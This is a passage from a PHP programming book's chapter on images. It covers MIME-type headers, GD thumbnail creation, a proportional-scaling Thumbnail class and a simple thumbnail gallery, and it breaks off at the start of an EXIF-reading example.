■ http://www.mailinjection.com/
■ http://www.nyphp.org/phundamentals/email_header_injection.php


8
 For more information on PHP’s implementation of pcre go to http://www.php.net/pcre/. For additional
general information on regular expressions, check out http://www.regular-expressions.info/ on the Web.

Summary
Email is a critical element of any business or web site. It provides a simple, easy
way to communicate with your customers, visitors, coworkers, and even your
server. Hopefully, this chapter has thrown a little light on some of the ways you
can harness the power of PHP, and the flexibility of the PEAR::Mail and
PEAR::Mail_Mime classes, to easily create and receive emails.

      Now go forth and use that power—to send newsletters, server updates, information,
      and visitor feedback—for good and not evil!
Chapter 8

Images
Building a web site can extend your creativity far beyond a display of (X)HTML
formatted text, if you so choose. The umbrella term multimedia describes the delivery
of many forms of content to your desktop, including sound, text, images, animation,
and movies. Where images are concerned, PHP has great capabilities—you can use
it to do a whole lot more than simply add static images to your HTML.

Would you like to be able to add a watermark to your images, create appropriately
sized thumbnails for your web page, or build a graph based on figures stored in
your database? Would you like to do all that automatically and on the fly, using
nothing but PHP? We’ll cover all this and more in the following pages.

To use the examples here, you’ll need the GD image library for PHP. I’ll assume you
have GD version 2.0 or higher (bundled with the latest versions of PHP) with FreeType,
JPEG, GIF, and PNG support built in. The PHP functions that use the GD library
are documented in The PHP Manual.1 The year 2004 saw the end of patent issues
with GIF images, and support for this format in the GD library has been re-enabled
since version 2.0.28, which was released with version 4.3.9 of PHP.


1
    http://www.php.net/gd/

      Although the GD library supports GIF images again, it’s worth noting that PNG is
      capable of supporting alpha channel transparency and full 64-bit images, compared
      with GIF’s 8 bits. In addition, PNG uses a more efficient compression algorithm,
      reducing the amount of bandwidth required.

      While this chapter focuses on the technical details of creating, manipulating, and
      using images and related libraries, you might also like to brush up on the basics.
      Mike Doughty has a great introduction to working with images and graphics on his
      web site.2


      How do I specify the correct image MIME type?
      MIME stands for Multipurpose Internet Mail Extensions, a standard originally
      conceived to help identify different email content types. MIME has since become
      the de facto standard for the description of content types on the Internet. When you
      work with images in PHP, it’s important to have a grasp of the different content
      types, or you may end up struggling for hours with what’s actually a simple problem.

      Solution
      Generally speaking, your web server must announce content type by way of a special
      Content-Type header before it sends requested content to the user’s browser, so
      that the browser knows what to do with the content. For example, here are the
      headers that a server might send to announce an image in Portable Network
      Graphics (PNG) format:

          HTTP/1.1 200 OK
          Date: Fri, 28 Mar 2003 21:42:44 GMT
          Server: Apache/1.3.27 (Unix) PHP/4.3.1
          Last-Modified: Wed, 26 Feb 2003 01:27:19 GMT
          Content-Length: 1164
          Connection: close
          Content-Type: image/png





      2
          http://www.sketchpad.net/readme.htm

The Content-Type header is used to specify the MIME type of the content served
in response to a request for the current URL. In this case, the MIME type is
image/png, which signifies a PNG image.

The MIME type becomes important in PHP when we generate an image from a script.
By default, PHP scripts send a MIME type of text/html (denoting
an HTML document). So, in instances when your script is sending an image instead
of HTML, you’ll need to specify the MIME type with PHP’s header function, and you
must call it before the script sends any output. Here’s an example:

    <?php
    header('Content-Type: image/png');
    ?>



A list of the common MIME types you’ll need for images is shown in Table 8.1.

Table 8.1. MIME Types for Images

    Image Format                                    MIME Type
    JPEG File Interchange Format (.jpeg/.jpg)       image/jpeg (a)
    Portable Network Graphics (.png)                image/png
    Graphics Interchange Format (.gif)              image/gif
    Windows Bitmap (.bmp)                           image/bmp
    Scalable Vector Graphics (.svg)                 image/svg+xml

(a) Internet Explorer understands the image/jpeg type, but when uploading a JPEG image, it sends a
type of image/pjpeg.
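
If a script serves several formats, a small lookup saves repeating these strings. The sketch below covers the formats in Table 8.1; the function name mimeTypeForExtension is hypothetical, and it trusts the file extension, which is only reasonable for files you created yourself:

```php
<?php
// Hypothetical helper: map a file extension to the MIME type to send.
// Returns null for extensions that are not in the list.
function mimeTypeForExtension(string $filename): ?string
{
    $types = [
        'jpg'  => 'image/jpeg',
        'jpeg' => 'image/jpeg',
        'png'  => 'image/png',
        'gif'  => 'image/gif',
        'bmp'  => 'image/bmp',
        'svg'  => 'image/svg+xml',
    ];
    // Lowercase the extension so PHOTO.JPG and photo.jpg match alike.
    $ext = strtolower(pathinfo($filename, PATHINFO_EXTENSION));
    return $types[$ext] ?? null;
}
```

A script could then pass the result to header('Content-Type: ' . $type) after checking that it isn't null.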



How do I create thumbnail images?
If your site will allow images to be uploaded, perhaps for display with submitted
content, how can you make sure the images displayed will be of a suitable size? If
a user uploads a particularly large image, it might destroy the layout of the page
when it’s displayed.

Solution
One solution to this problem is to create thumbnail images, which guarantee that
the images displayed never exceed certain height and width values.

      Building a basic thumbnail is a five-stage process:

      1.   Load the source image into a PHP variable.
      2.   Determine the height and width of the original image.
      3.   Create a blank thumbnail image of the correct size.
      4.   Copy the original image to the blank thumbnail.
      5.   Display the thumbnail using the correct content type.

      Let’s create a thumbnail from a photo in JPEG format. First, we specify the path to
      the source image, as well as our desired width and height in pixels:

                                                                      thumb.php (excerpt)

       <?php
       $sourceImage = 'sample_images/terrier.jpg';
       $thumbWidth = 200;
       $thumbHeight = 200;



      Next, we use imagecreatefromjpeg to load an image from the file system into a
      PHP variable: $original. The getimagesize function returns the width and height
      of the image (we’ll discuss getimagesize further in “How do I resize images without
      stretching them?”):

                                                                      thumb.php (excerpt)

       $original = imagecreatefromjpeg($sourceImage);
       $dims = getimagesize($sourceImage);



      We then use the imagecreatetruecolor function to create a blank image (in memory,
      as PHP variable $thumb) into which the thumbnail image will be placed:

                                                                      thumb.php (excerpt)

       $thumb = imagecreatetruecolor($thumbWidth,$thumbHeight);



      As the function name suggests, imagecreatetruecolor creates a true color (24-bit)
      image, as opposed to the palette-based (8-bit) image that the imagecreate function
      provides. The imagecreatefromjpeg function we used previously creates a true
      color image from the source file, so we need the thumbnail to be true color as well.

The next line in the example code is the point at which the thumbnail image is
actually created from the original:

                                                                thumb.php (excerpt)

    imagecopyresampled( $thumb, $original, 0, 0, 0, 0,
        $thumbWidth, $thumbHeight, $dims[0], $dims[1] );



The imagecopyresampled function places a resized version of the image into the
blank thumbnail image, resampling along the way to ensure that the image is resized
smoothly. An older version of this function, imagecopyresized, changes the size
of the image more crudely.

The first two arguments to the function represent the destination image, $thumb,
and the source image, $original. The imagecopyresampled function is quite flexible
and can be used to copy a portion of one image into another. The next four arguments
refer to the x and y coordinates of the destination and source image portions, taken
from the top-left corner. As we’re only interested in copying the whole image, we
supply 0 for all four arguments. The final four arguments represent the width and
height of the destination and source image portions. Again, as we wish to copy the
whole image, we supply the full dimensions of each image. Refer to The PHP
Manual for more information.3
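
To show the coordinate and size arguments doing more than copying the whole image, here is a sketch that copies only the largest centered square of the source into a square thumbnail. Both function names are hypothetical; centerCropBox is plain arithmetic, while squareThumb assumes the GD extension is available:

```php
<?php
// Hypothetical helper: find the largest centered square in an image.
// Returns [srcX, srcY, side] for use as the source portion.
function centerCropBox(int $width, int $height): array
{
    $side = min($width, $height);
    $srcX = intdiv($width - $side, 2);
    $srcY = intdiv($height - $side, 2);
    return [$srcX, $srcY, $side];
}

// Hypothetical helper: copy that square portion of $original (a GD
// image) into a new $size x $size true color image. Requires GD.
function squareThumb($original, int $size)
{
    [$srcX, $srcY, $side] = centerCropBox(
        imagesx($original), imagesy($original));
    $thumb = imagecreatetruecolor($size, $size);
    // Destination starts at 0,0; source starts at the crop offset.
    imagecopyresampled($thumb, $original, 0, 0, $srcX, $srcY,
        $size, $size, $side, $side);
    return $thumb;
}
```

For a 600×450 source, the crop box starts 75 pixels from the left edge and is 450 pixels on each side, so the thumbnail is cropped rather than stretched.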

Finally, after we’ve sent the correct content type header, Content-type: image/jpeg,
we use imagejpeg to output the completed thumbnail:

                                                                thumb.php (excerpt)

    header( "Content-type: image/jpeg" );
    imagejpeg( $thumb );
    ?>



Figure 8.1 shows the end result.




3
    http://www.php.net/imagecopyresampled/




                                      Figure 8.1. Our first thumbnail


      While there’s certainly room for improvement, this is a start.


      How do I resize images without stretching them?
      Unless the original and thumbnail images happen to share the same width-to-height
      ratio (or aspect ratio), the process of resizing the images to generate your thumbnails
      will warp the dimensions of the images. What we really want is a proportionally
      scaled version of the original, which fits into the blank thumbnail as neatly as
      possible.

      Solution
      It’s possible to determine the original image’s dimensions and use these to calculate
      the proportional dimensions of the thumbnails. The getimagesize function returns
      an array of useful information about an image. Here’s an example:

       <?php
       $sourceImage = 'sample_images/terrier.jpg';
       $dims = getimagesize($sourceImage);
       echo ( '<pre>' );
       print_r($dims);
       echo ( '</pre>' );
       ?>



      The above example will display the contents of the $dims variable:

    Array
    (
        [0] => 600
        [1] => 450
        [2] => 2
        [3] => width="600" height="450"
        [bits] => 8
        [channels] => 3
        [mime] => image/jpeg
    )



The first element of the array is the width of the image; the second is its height. The
third array element is a number that identifies the type of image, for which a 1 indicates
the image is a GIF, 2 indicates a JPEG, and 3 a PNG; more values are described
in The PHP Manual.4 The fourth array element contains a string that’s intended
to be used within HTML <img> tags. The bits element contains the color
depth.5 The channels element contains a value of 3 for RGB color images and 4 for
CMYK.6 The mime element contains the MIME type.
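
Numeric indexes are easy to mix up, so it can help to copy the values you need into named keys straight away. This sketch uses a hypothetical function, summarizeImageInfo, and feeds it the sample values from the terrier image instead of reading a file:

```php
<?php
// Hypothetical helper: pull the commonly used values out of the array
// returned by getimagesize() into named keys.
function summarizeImageInfo(array $dims): array
{
    return [
        'width'  => $dims[0],
        'height' => $dims[1],
        'mime'   => $dims['mime'],
        // Width divided by height; 1.0 means a square image.
        'aspect' => $dims[0] / $dims[1],
    ];
}

// Sample values copied from the terrier image output.
$info = summarizeImageInfo([
    0 => 600, 1 => 450, 2 => 2,
    3 => 'width="600" height="450"',
    'bits' => 8, 'channels' => 3, 'mime' => 'image/jpeg',
]);
```

The aspect value is the width-to-height ratio that the rest of this section sets out to preserve.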

In this section, we’ll write a class called Thumbnail that allows the generation of
proportionally scaled images. The class will also make it possible for us to deal
with images that are smaller than the thumbnail size, allowing them to be left at
their original size if required. The class will be designed to handle JPEG, PNG, and
GIF files, but can easily be modified to handle other formats.

We need to define some custom exceptions for our error handling needs before we
start to create our Thumbnail class:

                                                                        Thumbnail.class.php (excerpt)

    class ThumbnailException extends Exception
    {
      public function __construct($message = '', $code = 0)
      {
        parent::__construct($message, $code);
        // log the details of every thumbnail exception
        error_log('Error in '.$this->getFile().
          ' Line: '.$this->getLine().
          ' Error: '.$this->getMessage()
        );
      }
    }
    class ThumbnailFileException extends ThumbnailException {}
    class ThumbnailNotSupportedException extends ThumbnailException {}

4
  http://www.php.net/getimagesize/
5
  Eight bits can represent 256 colors, and 8-bit color is known as indexed color. True, or 24-bit color can
represent 16,777,216 colors.
6
  The RGB (Red-Green-Blue) color model is used for computer displays, while CMYK
(Cyan-Magenta-Yellow-blacK) is used for printing.





      Our base custom exception class, ThumbnailException, ensures the exception details
      are logged using the error_log function. The subclasses represent different exception
      situations that might arise during the creation of the thumbnail.
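
A hierarchy like this lets calling code decide how specific it wants to be. The sketch below uses stand-in classes with the same names and inheritance (logging left out for brevity) plus two hypothetical functions, loadOrFail and describeFailure, to show the order in which catch blocks are tried:

```php
<?php
// Stand-in classes with the same hierarchy as the thumbnail
// exceptions (logging omitted to keep the sketch short).
class ThumbnailException extends Exception {}
class ThumbnailFileException extends ThumbnailException {}
class ThumbnailNotSupportedException extends ThumbnailException {}

// Hypothetical function that fails the way a loader might.
function loadOrFail(string $mime): string
{
    if ($mime !== 'image/jpeg') {
        throw new ThumbnailNotSupportedException(
            'Image MIME type ' . $mime . ' not supported');
    }
    return 'loaded';
}

// Hypothetical caller: the specific catch block comes first, and the
// base class acts as a catch-all for any other thumbnail error.
function describeFailure(string $mime): string
{
    try {
        return loadOrFail($mime);
    } catch (ThumbnailNotSupportedException $e) {
        return 'unsupported: ' . $e->getMessage();
    } catch (ThumbnailException $e) {
        return 'thumbnail error: ' . $e->getMessage();
    }
}
```

Code that doesn't care about the distinction can catch ThumbnailException alone and still handle both subclasses.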

      As with any class, we start with the class properties:

                                                               Thumbnail.class.php (excerpt)

       class Thumbnail
       {
         private $maxWidth;
         private $maxHeight;
         private $scale;
         private $inflate;
         private $types;
         private $imgLoaders;
         private $imgCreators;
         private $source;
         private $sourceWidth;
         private $sourceHeight;
         private $sourceMime;
         private $thumb;
         private $thumbWidth;
         private $thumbHeight;



      $maxWidth, $maxHeight, $scale, $inflate, $types, $imgLoaders, and $imgCreators
      are set by the constructor and are described below. $source, $sourceWidth,
      $sourceHeight, and $sourceMime represent the properties of the source image and
      will be set by the image loading methods described below. $thumb, $thumbWidth,
      and $thumbHeight represent the properties of the created thumbnail and are also
      described below.

Next, we create a class constructor:

                                                         Thumbnail.class.php (excerpt)

   public function __construct($maxWidth, $maxHeight, $scale = true,
       $inflate = true)
   {
     $this->maxWidth = $maxWidth;
     $this->maxHeight = $maxHeight;
     $this->scale = $scale;
     $this->inflate = $inflate;



The constructor for the Thumbnail class takes four arguments. The first two are the
maximum width and height of the thumbnail in pixels, respectively. The third argument
tells the Thumbnail object whether it should scale the image to the thumbnail
proportionally, or just stretch it, as with the earlier example. The fourth argument
tells the Thumbnail object what to do with images that are too small; that is,
whether to blow them up to fill the thumbnail.

With those arguments safely stored in instance variables, we can create the rest of
the constructor:

                                                         Thumbnail.class.php (excerpt)

       $this->types = array('image/jpeg', 'image/png', 'image/gif');
       $this->imgLoaders = array(
           'image/jpeg' => 'imagecreatefromjpeg',
           'image/png' => 'imagecreatefrompng',
           'image/gif' => 'imagecreatefromgif'
       );
       $this->imgCreators = array(
           'image/jpeg' => 'imagejpeg',
           'image/png' => 'imagepng',
           'image/gif' => 'imagegif'
       );
   }



The $this->types property stores an array of the MIME types that this class can
handle. The $this->imgLoaders property stores the names of the functions used
to load images of those MIME types, while the $this->imgCreators property stores
the names of the functions for creating new images of those types.
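
Storing function names as strings works because PHP lets you call a function through a variable that holds its name. Since a GD build may lack support for a given format, it can be worth confirming that the name is callable first. This is a sketch of that check, using a hypothetical helper called resolveLoader:

```php
<?php
// Hypothetical helper: look up the loader function name for a MIME
// type and confirm it can be called before handing it back.
function resolveLoader(string $mime, array $loaders): string
{
    if (!isset($loaders[$mime])) {
        throw new InvalidArgumentException("No loader for $mime");
    }
    if (!is_callable($loaders[$mime])) {
        // For GD functions this usually means the extension, or
        // support for that format, is not compiled in.
        throw new RuntimeException($loaders[$mime] . ' is unavailable');
    }
    return $loaders[$mime];
}
```

A caller would use it as $loader = resolveLoader($mime, $map); followed by $image = $loader($file);.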

      The Thumbnail class provides two methods for loading the image you want to convert.
      The first, loadFile, allows you to specify a local file to load:

                                                             Thumbnail.class.php (excerpt)

         public function loadFile ($image)
         {
           if (!$dims = @getimagesize($image))
           {
             throw new ThumbnailFileException(
                 'Could not find image: '.$image);
           }
           if (in_array($dims['mime'],$this->types))
           {
             $loader = $this->imgLoaders[$dims['mime']];
             $this->source = $loader($image);
             $this->sourceWidth = $dims[0];
             $this->sourceHeight = $dims[1];
             $this->sourceMime = $dims['mime'];
             $this->initThumb();
             return true;
           }
           else
           {
             throw new ThumbnailNotSupportedException(
                 'Image MIME type '.$dims['mime'].' not supported');
           }
         }



      The loadFile method uses the getimagesize function to grab all the required image
      properties, including width, height, and MIME type. If getimagesize returns false,
      an error has occurred and we throw one of our custom exceptions,
      ThumbnailFileException. If the MIME type of the image is not on our list of supported
      types, we throw a ThumbnailNotSupportedException. If all’s well, we load
      the image via the image loading function that’s appropriate for the MIME type, and
      assign it to the $this->source property. We also assign the image width to the
      $this->sourceWidth property, the image height to the $this->sourceHeight
      property, and MIME type to the $this->sourceMime property.

      After all the instance variables are set, the method calls the initThumb method,
      which we’ll tackle in a moment. Finally, having no exceptions, the method returns
      true.

The loadData method performs the same function as loadFile, except that we load
an image from a string rather than a file. The string might come from a database, for
example. Here’s our loadData method:

                                                         Thumbnail.class.php (excerpt)

   public function loadData ($image, $mime)
   {
     if ( in_array($mime,$this->types) ) {
       if($this->source = @imagecreatefromstring($image))
       {
         $this->sourceWidth = imagesx($this->source);
         $this->sourceHeight = imagesy($this->source);
         $this->sourceMime = $mime;
         $this->initThumb();
         return true;
       }
       else
       {
         throw new ThumbnailFileException(
             'Could not load image from string');
       }
     }
     else
     {
       throw new ThumbnailNotSupportedException(
           'Image MIME type '.$mime.' not supported');
     }
   }



While the loadData method performs the same function and sets the same instance
variables as the loadFile method, the functions it uses are not the same as
loadFile’s. After checking the MIME type, the loadData method uses the
imagecreatefromstring function to load the image, throwing a ThumbnailFileException
if the image cannot be created. The imagecreatefromstring function returns an image
resource obtained from the string data passed to it. The width and height of our
source images are obtained by the imagesx and imagesy functions, which, predictably,
return an image’s width and height. In addition to the image data, you also
need to supply the MIME type as the second argument to the loadData method.
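
If you'd rather not rely on the caller to supply the right MIME type, PHP can read it from the data itself with getimagesizefromstring, the string counterpart of getimagesize. The following is a sketch only; the detectMime function is hypothetical, and the sample data is a tiny 1×1 pixel PNG encoded as base64:

```php
<?php
// Hypothetical helper: read the MIME type from the image data itself,
// so the caller does not have to supply it. Returns null when the
// data is not a recognizable image.
function detectMime(string $imageData): ?string
{
    $info = @getimagesizefromstring($imageData);
    return $info === false ? null : $info['mime'];
}

// A 1x1 pixel PNG, base64-encoded, used here as sample data.
$png = base64_decode(
    'iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVR42mNkYPhf'
    . 'DwAChwGA60e6kgAAAABJRU5ErkJggg=='
);
```

The detected type could then be passed as the second argument to loadData, or compared with the type the caller claimed.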

Next, the buildThumb method is used to render the finished thumbnail:

                                                               Thumbnail.class.php (excerpt)

         public function buildThumb($file = null)
         {
           $creator = $this->imgCreators[$this->sourceMime];
           if (isset($file)) {
             return $creator($this->thumb, $file);
           } else {
             return $creator($this->thumb);
           }
         }



      If you pass this method a filename, the thumbnail will be stored as a file that uses
      the name you’ve specified. Otherwise, the image is output directly to the browser,
      so you’ll need to make sure that you’ve sent the correct HTTP header first, which
      you’ll see in the usage example that follows the Thumbnail class description. Notice
      that we use the image function names we assigned to the $this->imgCreators
      property in the constructor.

      The final public methods are used to glean information about the thumbnail. The
      getMime method returns the MIME type, which can be used to generate a
      Content-Type header for the thumbnail:

                                                               Thumbnail.class.php (excerpt)

         public function getMime()
         {
             return $this->sourceMime;
         }



      The getThumbWidth and getThumbHeight methods are used to return the width and
      height of the thumbnail in pixels; you could use that information to create an HTML
      img tag, for example:

                                                               Thumbnail.class.php (excerpt)

         public function getThumbWidth()
         {
             return $this->thumbWidth;
         }
         public function getThumbHeight()
         {
             return $this->thumbHeight;
         }




Our class has a private method, called initThumb, that’s called by the loading
methods I described previously. initThumb handles the scaling and inflating functions
of our class. The first step is to handle scaling:

                                                           Thumbnail.class.php (excerpt)

   private function initThumb ()
   {
     if ( $this->scale )
     {
       if ( $this->sourceWidth > $this->sourceHeight )
       {
         $this->thumbWidth = $this->maxWidth;
         $this->thumbHeight = floor(
             $this->sourceHeight *
                 ($this->maxWidth/$this->sourceWidth)
         );
       }
       else if ( $this->sourceWidth < $this->sourceHeight )
       {
         $this->thumbHeight = $this->maxHeight;
         $this->thumbWidth = floor(
             $this->sourceWidth *
                 ($this->maxHeight/$this->sourceHeight)
         );
       }
       else
       {
         $this->thumbWidth = $this->maxWidth;
         $this->thumbHeight = $this->maxHeight;
       }
     }



This part of the function will check to ascertain whether or not image scaling is
required. If it is, some calculations will be performed to determine the appropriate
size for the thumbnail so that it matches the width and height ratio of the original
image, constraining the longest axis to the maximum size originally supplied to the
constructor.
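
Constraining the longest axis works well when the maximum width and height are equal, as they are in our examples. If the bounding box isn't square, a landscape image scaled to the full width can still come out taller than the maximum height. The sketch below is an alternative calculation, not the one used in the class; the function name fitWithin is hypothetical, and it uses integer arithmetic to avoid rounding surprises:

```php
<?php
// Hypothetical helper: scale a source size to fit inside a bounding
// box while keeping its aspect ratio. Returns [width, height].
function fitWithin(int $srcW, int $srcH, int $maxW, int $maxH): array
{
    // Cross-multiplying compares the two aspect ratios without
    // floating point: true when the source is relatively wider
    // than the box, so width is the limiting side.
    if ($srcW * $maxH >= $srcH * $maxW) {
        return [$maxW, max(1, intdiv($srcH * $maxW, $srcW))];
    }
    // Otherwise height is the limiting side.
    return [max(1, intdiv($srcW * $maxH, $srcH)), $maxH];
}
```

For our 600×450 terrier, a 200×200 box gives 200×150, while a 200×50 box gives 66×50, which stays inside both limits.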

      If scaling isn’t required, we simply use the $maxWidth and $maxHeight values originally
      supplied to the constructor:

                                                              Thumbnail.class.php (excerpt)

            else
            {
              $this->thumbWidth = $this->maxWidth;
              $this->thumbHeight = $this->maxHeight;
            }



      The next step is to create our blank thumbnail image by employing the
      imagecreatetruecolor function:

                                                              Thumbnail.class.php (excerpt)

            $this->thumb = imagecreatetruecolor(
                $this->thumbWidth,
                $this->thumbHeight
            );



      The final step in our initThumb method is to copy the source image into our
      thumbnail image:

                                                              Thumbnail.class.php (excerpt)

          if ( $this->sourceWidth <= $this->maxWidth &&
                   $this->sourceHeight <= $this->maxHeight &&
                       $this->inflate == false )
           {
             // keep the original image, and report its real dimensions
             $this->thumb = $this->source;
             $this->thumbWidth = $this->sourceWidth;
             $this->thumbHeight = $this->sourceHeight;
           }
           else
           {
             imagecopyresampled( $this->thumb, $this->source, 0, 0, 0, 0,
                 $this->thumbWidth, $this->thumbHeight,
                 $this->sourceWidth, $this->sourceHeight
             );
           }
         }
       }




If the source image is smaller than the specified thumbnail image size and the
inflate property is set to false, the thumb property is set to the original image.
Otherwise, the imagecopyresampled function is used to resample the source image
into the blank thumbnail image. We talked about the imagecopyresampled function
in more detail in “How do I create thumbnail images?”.

That’s it for our class! Let’s take it for a spin. Here’s a quick demonstration that
outputs a thumbnail based on a file:

                                                                       thumbFromFile.php (excerpt)

 <?php
 require_once('Thumbnail.class.php');
 $tn = new Thumbnail(200,200);
 $tn->loadFile('sample_images/terrier.jpg');
 header('Content-Type: '.$tn->getMime());
 $tn->buildThumb();
 ?>



First, we instantiate a Thumbnail object, specifying that we want our thumbnail to
have dimensions of 200×200px. Then we call the loadFile method and pass it a
filename. We use the PHP header function together with the getMime method to
send the correct HTTP header; then, we simply call the buildThumb method to display
the image. The result of our work is shown in Figure 8.2.




                           Figure 8.2. A proportionally scaled thumbnail


Here’s another example to show off the loadData method and illustrate how files
can be stored rather than output directly:

                                                                beforeAndAfter.php (excerpt)

       <?php
       require_once('Thumbnail.class.php');
       $tn = new Thumbnail(200, 200);
       $image = file_get_contents('sample_images/terrier.jpg');
       $tn->loadData($image, 'image/jpeg');
       $tn->buildThumb('sample_images/nice_doggie.jpg');
       ?>



      We begin by including our class and instantiating our Thumbnail object. We simulate
      a source image string with the file_get_contents function. In a real-world situation,
      of course, this string would probably come from a database. We use the loadData
      method to load our image string and call the buildThumb method, but this time we
      also pass a filename argument to make the method save our thumbnail to a file at
      sample_images/nice_doggie.jpg.

      Next comes the HTML for our example page:

                                                                beforeAndAfter.php (excerpt)

       <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
         "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
       <html xmlns="http://www.w3.org/1999/xhtml">
         <head>
           <title> Thumbnail Example </title>
           <meta http-equiv="Content-Type"
               content="text/html; charset=iso-8859-1" />
           <style type="text/css">
             div { float: left; }
           </style>
         </head>
         <body>
           <div>
             <h1>Before...</h1>
             <p>
             <img src="sample_images/terrier.jpg" alt="Original Image" />
             </p>
           </div>
           <div>
             <h1>After...</h1>
             <p>
               <img src="sample_images/nice_doggie.jpg"
                   width="<?php echo ( $tn->getThumbWidth() );?>"
                   height="<?php echo ( $tn->getThumbHeight() );?>"
                   alt="Resized Image" />
             </p>
           </div>
         </body>
       </html>




Notice that as we generate the image tag for the thumbnail, we use the getThumbWidth
and getThumbHeight methods to complete the <img> tag’s width and height attributes.
The resulting page can be seen in Figure 8.3.




                         Figure 8.3. The image before and after resizing


There, now Rover looks cute at any size!


      How can I put together a simple thumbnail gallery?
      In the previous section, we investigated how to create thumbnails without
      causing your much-loved pooch to look like some strange dog–bat hybrid. Armed
      with that knowledge, it should be an easy task to build a simple thumbnail gallery
      from a directory that contains PNG, GIF, and JPEG files!

      Solution
      We’ll use the Thumbnail class we created in the previous section, together with
      PHP’s built-in dir pseudo-class (refer to the section called “Using the dir
      Pseudo-Class” in Chapter 6 for more information on the dir pseudo-class) to create our
      gallery. We simply read through the directory, look for images that don’t have
      thumbnails, and create them; at the same time, we generate the HTML that will
      display them. An important benefit of this approach (creating and storing thumbnails
      on the disk) is that it saves us the overhead of having to create the thumbnails
      dynamically each time.

      The first step we need to take, of course, is to include our Thumbnail class and initialize
      our $image_html variable to an empty string:

                                                                 thumbGallery.php (excerpt)

       <?php
       require_once('Thumbnail.class.php');
       $image_html = '';



      The $image_html variable will eventually hold all the HTML for our gallery.

      Next, we use the dir pseudo-class to get a Directory object for our sample_images
      directory. This object allows us to start a while loop, which will loop over all the
      directory entries within sample_images:

                                                                 thumbGallery.php (excerpt)

       $dir = dir('sample_images');
       while ($image = $dir->read())
       {

Each loop will assign the next directory entry, obtained using the $dir->read
method, to the $image variable. When there are no more directory entries, the loop
will terminate.

Next, we check that the directory entry we’ve obtained is an image file we want to
include in our gallery:

                                                               thumbGallery.php (excerpt)

   $ext = explode('.',$image);
   $size = count($ext);
   if (($ext[$size-1] == 'png' ||
       $ext[$size-1] == 'jpg' ||
       $ext[$size-1] == 'gif')
       && !preg_match('/^thumb_/', $image)
       && $image != '.' && $image != '..')
   {



To check that the current directory entry is an image we want to include in our
gallery, we first examine the file extension to ensure it’s a .png, .jpg, or .gif. We then
make sure that the filename doesn’t begin with thumb_, which would indicate that
it’s one of our thumbnails, and that the entry is not the . or .. directory entry.
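
The same test can be wrapped up in a small function. What follows is only a sketch: isGalleryImage is a hypothetical helper that isn't part of thumbGallery.php, and it deliberately goes a little further than the check above by assuming you'd also want to accept the .jpeg extension and uppercase extensions such as .JPG:

```php
<?php
// Hypothetical helper (not part of the book's thumbGallery.php):
// decides whether a directory entry should appear in the gallery.
function isGalleryImage($filename)
{
    // pathinfo() returns the text after the final dot; lowercase it
    // so that ROVER.JPG and rover.jpg are treated alike.
    $ext = strtolower(pathinfo($filename, PATHINFO_EXTENSION));
    $allowed = array('png', 'jpg', 'jpeg', 'gif');

    // Skip our own thumbnails, which carry the thumb_ prefix.
    $isThumb = (strpos($filename, 'thumb_') === 0);

    return in_array($ext, $allowed, true) && !$isThumb;
}
```

The . and .. entries need no special treatment here, because neither has an extension that appears in the allowed list.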

Provided these conditions are met, we proceed to create the thumbnail:

                                                               thumbGallery.php (excerpt)

      if ( !file_exists('sample_images/thumb_'.$image) )
      {
        $tn = new Thumbnail(200, 200, true, false);
        $tn->loadFile('sample_images/'.$image);
        $tn->buildThumb('sample_images/thumb_'.$image);
      }



First, we check to make sure a thumbnail doesn’t already exist for the current image.
Then, we create a new thumbnail with our Thumbnail class and save it, prepending
thumb_ to the filename.
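
Checking only that the thumbnail exists means an image that's later replaced keeps its old thumbnail. One possible refinement, sketched here with a hypothetical thumbnailIsStale function that isn't part of the original script, is to compare the two files' modification times as well:

```php
<?php
// Hypothetical helper: returns true when the thumbnail is missing
// or older than the image it was generated from.
function thumbnailIsStale($source, $thumb)
{
    if (!file_exists($thumb)) {
        return true;
    }
    // filemtime() gives each file's last-modified time as a Unix timestamp.
    return filemtime($source) > filemtime($thumb);
}
```

In the gallery script, a call such as thumbnailIsStale('sample_images/'.$image, 'sample_images/thumb_'.$image) could stand in for the !file_exists() test.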

The last step inside the while loop adds the HTML markup for the current image:

                                                                  thumbGallery.php (excerpt)

             $image_html .= '<div class="image">' .
                 '<a href="sample_images/'.$image.'">' .
                 '<img src="sample_images/thumb_'.$image.'">' .
                 '</a></div>';
         }
       }
       ?>



      The HTML for the gallery page is quite simple; once the layout and the CSS style
      sheet have been created, the markup for the images is output from the $image_html
      variable:

                                                                  thumbGallery.php (excerpt)

       <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
         "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
       <html xmlns="http://www.w3.org/1999/xhtml">
         <head>
           <title> Thumbnail Example </title>
           <style type="text/css">
             ⋮ insert attractive visual style here…
           </style>
         </head>
         <body>
           <h1>Gallery</h1>
           <?php echo ( $image_html ); ?>
         </body>
       </html>



      An example of this script’s output appears in Figure 8.4.




                              Figure 8.4. Our thumbnail gallery
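
The markup built inside the while loop drops each filename straight into HTML attributes, which is fine for tidy names like terrier.jpg but could break the page if a filename contained a quote or an angle bracket. As a rough sketch, assuming a hypothetical galleryItemHtml helper that isn't part of thumbGallery.php, the markup for one entry could be escaped like this:

```php
<?php
// Hypothetical helper: builds the markup for one gallery entry,
// escaping the filename for use in HTML attributes.
function galleryItemHtml($dir, $image)
{
    $full  = htmlspecialchars($dir . '/' . $image, ENT_QUOTES);
    $thumb = htmlspecialchars($dir . '/thumb_' . $image, ENT_QUOTES);

    return '<div class="image">' .
        '<a href="' . $full . '">' .
        '<img src="' . $thumb . '" alt="" />' .
        '</a></div>';
}
```

Inside the loop, the result would simply be appended to $image_html.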


How do I extract EXIF
information from images?
Now that you have a functional gallery, you might like to provide visitors with extra
information about the photo. The exchangeable image file format, better known as
EXIF format, provides a mechanism for the storage of metadata within images; most
digital cameras and image editing applications support this facility natively. If
you’ve taken some of the images in your photo gallery with your digital camera,
you can extract the EXIF data, such as date and time of the photo, the camera
model, and the camera settings used, and display it alongside the shots.

Solution
Extracting this information is simplicity itself when you seek a little help from
PHP’s EXIF functions. To use the EXIF functions, you need to ensure your PHP installation
has EXIF support enabled. Please read the instructions on the EXIF functions manual
page.7

      The exif_read_data function reads all the meta information from a JPEG or TIFF
      image into an array. Take a look at this example:

                                                                            exif.php (excerpt)

          <?php
              // Get the exif data
              $exif_data = exif_read_data( 'sample_images/terrier.jpg' );
